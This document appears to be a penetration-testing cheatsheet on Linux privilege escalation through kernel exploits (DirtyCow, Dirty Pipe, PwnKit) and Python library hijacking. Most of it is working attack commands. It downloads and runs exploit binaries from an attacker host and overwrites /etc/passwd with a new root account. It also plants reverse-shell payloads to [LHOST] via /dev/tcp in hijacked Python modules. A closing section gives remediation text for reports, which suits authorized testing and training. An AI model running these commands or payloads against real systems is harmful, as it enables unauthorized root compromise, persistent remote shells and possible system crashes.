🛡️ Methodology Checklist
- Kernel version:
uname -r - Search exploits:
searchsploit linux kernel [version] - Check PwnKit:
pkexecis SUID-root and unpatched (CVE-2021-4034) - Compile exploit NATIVELY on target — not cross-compiled
- Check Python library path order:
python3 -c "import sys; print(sys.path)" - Find world-writable .py libraries used by root scripts
- Check for
SETENVin sudoers for python interpreter - If SETENV:
sudo PYTHONPATH=/tmp python3 [script]with malicious module at /tmp
🎯 Operational Context
Use when: No other privesc path found and kernel version is old — check for applicable kernel CVEs and Python-based privilege escalation techniques.
Think Dumber First: uname -a for kernel version. Search exploit-db.com for Linux [KERNEL_VERSION] local privilege escalation. Common targets: Dirty Cow (2.6.22-4.8.3), overlayfs exploits. Compile on matching architecture.
Skip when: Kernel is current — kernel exploit development and targeting is complex and risky; kernel exploits can crash the system.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
uname -a | Get kernel version for CVE lookup |
cat /etc/os-release | OS/distro version — affects exploit compatibility |
searchsploit "linux kernel [VERSION]" | Find kernel exploits |
searchsploit -m [EDB-ID] | Copy exploit to current directory |
gcc [exploit.c] -o exploit | Compile kernel exploit natively ON TARGET |
./exploit | Execute compiled kernel exploit |
python3 -c 'import sys; print(sys.path)' | Show Python sys.path load order |
pip3 show [MODULE] | Find module install location |
ls -la $(python3 -c 'import sys; print([p for p in sys.path if p][-1])') | Check if last sys.path dir is writable |
find / -name [MODULE].py 2>/dev/null | Find Python module file location |
ls -la [MODULE_PATH] | Check if module file is world-writable |
sudo -l | grep SETENV | Check for SETENV in sudoers — allows PYTHONPATH override |
sudo PYTHONPATH=/tmp [SUDO_BINARY] | Inject hijack path if SETENV+NOPASSWD |
find / -path /proc -prune -o -name "*.py" -writable -print 2>/dev/null | Find writable Python files |
🔬 Deep Dive & Workflow
Kernel Exploit Workflow
# Step 1: Identify kernel
uname -a
# Linux target 4.4.0-116-generic #140-Ubuntu SMP x86_64 GNU/Linux
# Step 2: Search for exploits
searchsploit "linux kernel 4.4.0"
searchsploit "linux local privilege escalation"
# Step 3: Download exploit
searchsploit -m 44298 # or wget from ExploitDB
# CRITICAL: Compile ON TARGET, not on Kali
# Architecture mismatch and GLIBC version differences will cause crashes
# Only pre-compile if target has no gcc
# Step 4: Transfer source to target if needed
python3 -m http.server 80 # attacker
wget http://[LHOST]/exploit.c -O /tmp/exploit.c # target
# Step 5: Compile and run on target
cd /tmp
gcc exploit.c -o exploit
chmod +x exploit
./exploitWhy compile natively: Kernel exploits depend on system call numbers, struct offsets, and GLIBC symbols that vary between kernel versions and distributions. Pre-compiled binaries frequently segfault on mismatched targets.
Key Kernel CVEs
| CVE | Kernel Range | Name | Notes |
|---|---|---|---|
| CVE-2016-5195 | < 4.8.3 | DirtyCow | Race condition in CoW; very reliable |
| CVE-2021-4034 | All pre-patch | PwnKit | pkexec SUID — user-space not kernel |
| CVE-2022-0847 | 5.8 – 5.16.11 | Dirty Pipe | Pipe overwrite arbitrary files |
| CVE-2021-3156 | sudo < 1.9.5p2 | Baron Samedit | Heap overflow in sudo |
| CVE-2017-16995 | 4.4 – 4.14 | eBPF | eBPF verifier bypass |
# DirtyCow — creates SUID copy of /bin/bash
gcc -pthread /tmp/dirtycow.c -o /tmp/dc -lcrypt
./dc [NEW_ROOT_PASS]
# → /tmp/passwd modified → su root with new password
# Dirty Pipe (CVE-2022-0847) — overwrite read-only files
./dirtypipe /etc/passwd 1 "root2:[HASH]:0:0:root:/root:/bin/bash\n"
su root2
# PwnKit (CVE-2021-4034) — pkexec, affects most distros until Jan 2022 (user-space, not kernel)
ls -l "$(which pkexec)" # -rwsr-xr-x → SUID-root → likely vulnerable if unpatched
# Self-contained PoC (e.g. ly4k/PwnKit single binary, or berdav/CVE-2021-4034)
wget http://[LHOST]/PwnKit -O /tmp/PwnKit && chmod +x /tmp/PwnKit && /tmp/PwnKit
# → instant root shell, no compiler neededPython Library Hijacking — Method 1: World-Writable Module
# Find imported module file
pip3 show psutil # → Location: /usr/local/lib/python3.8/dist-packages
# Check if module .py is world-writable
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
# → -rw-rw-rw- ← writable
# Append payload to module
echo "import os; os.system('bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1')" >> /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
# Trigger when script runs (especially as root via cron/sudo)Python Library Hijacking — Method 2: sys.path Priority
# Check sys.path order
python3 -c 'import sys; print(sys.path)'
# → ['', '/usr/lib/python38.zip', '/usr/lib/python3.8', '/home/user']
# Empty string = current directory (highest priority)
# Find what module the script imports
head -20 /opt/script.py # → import psutil
# Create fake module in current dir or writable high-priority path
cat > /home/user/psutil.py << 'EOF'
import os
os.system("bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1")
EOF
# Run from that directory (Python checks '' first)
cd /home/user && sudo python3 /opt/script.pyPython Library Hijacking — Method 3: SETENV + PYTHONPATH
# sudo -l shows:
# (root) SETENV: NOPASSWD: /usr/bin/python3 /opt/script.py
# Create hijack module in /tmp
cat > /tmp/psutil.py << 'EOF'
import os
os.setuid(0)
os.system("/bin/bash")
EOF
# Override PYTHONPATH with our directory (SETENV allows this)
sudo PYTHONPATH=/tmp python3 /opt/script.py
# → Python searches /tmp first → loads /tmp/psutil.py → root shellWhen Kernel Exploits Are Last Resort
# Kernel exploits can:
# - Panic/crash the system
# - Leave artifacts in kernel logs
# - Require reboot if they crash
# Always try first:
# 1. sudo -l → GTFOBins
# 2. SUID binaries → GTFOBins
# 3. Cron/service abuse
# 4. Credential hunting → reuse
# 5. NFS / Library hijacking
# Then: kernel exploits as final option
# LinPEAS kernel section:
# → [+] Sudo version → baron samedit
# → [+] Kernel exploits suggestions🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Kernel exploit crashes system | Target kernel mismatch | Only use kernel exploits as last resort; verify exact kernel version match; test in lab first |
| Compilation fails on target | No compiler or wrong gcc | Compile on attack box: gcc -o exploit exploit.c; transfer binary; ensure same architecture |
| Dirty Cow exploit fails | Kernel patched or wrong version | Dirty Cow works on 2.6.22 - 4.8.3 (CVE-2016-5195); check kernel version exactly |
| Python suid exploit not working | Python not SUID | SUID python extremely rare; verify SUID: ls -la $(which python3) |
| exploit-db PoC requires libraries | Missing dependencies | Try static compile: gcc -static -o exploit exploit.c; or use self-contained PoC |
📝 Reporting Trigger
Finding Title: Vulnerable Kernel Version Exploitable for Local Privilege Escalation Impact: Unpatched kernel vulnerability (e.g., CVE-2016-5195 Dirty Cow) allows any local user to escalate to root by exploiting a race condition in the kernel memory management subsystem, achieving complete system compromise. Root Cause: Operating system kernel not updated to apply security patches. No automated kernel update process or prolonged maintenance window delays. Recommendation: Apply kernel security updates on a defined schedule. Enable automatic security updates for kernel packages. Consider kernel hardening (grsecurity, PaX) for sensitive systems. Monitor kernel version exposure via vulnerability management platform.